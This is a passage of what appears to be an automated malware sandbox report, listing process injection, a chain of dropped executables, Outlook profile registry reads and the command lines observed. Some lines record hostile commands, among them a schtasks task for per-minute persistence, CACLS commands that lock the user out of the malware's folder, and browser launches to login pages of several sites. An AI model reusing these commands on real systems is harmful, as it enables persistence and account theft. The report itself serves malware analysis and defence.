N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4020 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3092 wrote to memory of 3032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FFEB.exe
PID 3092 wrote to memory of 3032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FFEB.exe
PID 3092 wrote to memory of 3032 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\FFEB.exe
PID 3092 wrote to memory of 4784 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\98.exe
PID 3092 wrote to memory of 4784 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\98.exe
PID 3092 wrote to memory of 4784 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\98.exe
PID 3032 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe
PID 3032 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe
PID 3032 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\FFEB.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe
PID 1368 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe
PID 1368 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe
PID 1368 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe
PID 3092 wrote to memory of 3392 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3092 wrote to memory of 3392 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3092 wrote to memory of 1764 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\28E.exe
PID 3092 wrote to memory of 1764 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\28E.exe
PID 3092 wrote to memory of 1764 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\28E.exe
PID 944 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe
PID 944 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe
PID 944 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe
PID 3092 wrote to memory of 3160 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\36A.exe
PID 3092 wrote to memory of 3160 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\36A.exe
PID 3092 wrote to memory of 3160 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\36A.exe
PID 1732 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe
PID 1732 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe
PID 1732 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe
PID 3092 wrote to memory of 3808 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4B3.exe
PID 3092 wrote to memory of 3808 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4B3.exe
PID 3092 wrote to memory of 3808 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\4B3.exe
PID 5112 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe
PID 5112 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe
PID 5112 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe
PID 3092 wrote to memory of 4184 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\793.exe
PID 3092 wrote to memory of 4184 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\793.exe
PID 3092 wrote to memory of 4184 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\793.exe
PID 3808 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3808 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3808 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\4B3.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 3392 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3392 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4020 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4020 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 2308 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\cmd.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 752 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\58B5.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe

"C:\Users\Admin\AppData\Local\Temp\3145da3c4eaad8597313817bdf5b98eba6e04257e6dd5a8eb19acc088e309bf4.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

C:\Users\Admin\AppData\Local\Temp\98.exe

C:\Users\Admin\AppData\Local\Temp\98.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D2.bat" "

C:\Users\Admin\AppData\Local\Temp\28E.exe

C:\Users\Admin\AppData\Local\Temp\28E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

C:\Users\Admin\AppData\Local\Temp\36A.exe

C:\Users\Admin\AppData\Local\Temp\36A.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

C:\Users\Admin\AppData\Local\Temp\4B3.exe

C:\Users\Admin\AppData\Local\Temp\4B3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

C:\Users\Admin\AppData\Local\Temp\793.exe

C:\Users\Admin\AppData\Local\Temp\793.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4184 -ip 4184

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 968 -ip 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 540

C:\Users\Admin\AppData\Local\Temp\2240.exe

C:\Users\Admin\AppData\Local\Temp\2240.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\255E.exe

C:\Users\Admin\AppData\Local\Temp\255E.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2264 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4385.exe

C:\Users\Admin\AppData\Local\Temp\4385.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\4F8C.exe

C:\Users\Admin\AppData\Local\Temp\4F8C.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N4IC5.tmp\LzmwAqmV.tmp" /SL5="$D0042,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\58B5.exe

C:\Users\Admin\AppData\Local\Temp\58B5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"

C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe

"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s

C:\Users\Admin\AppData\Local\Temp\6180.exe

C:\Users\Admin\AppData\Local\Temp\6180.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6092 -ip 6092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb153246f8,0x7ffb15324708,0x7ffb15324718

C:\Users\Admin\AppData\Local\Temp\6AA9.exe

C:\Users\Admin\AppData\Local\Temp\6AA9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

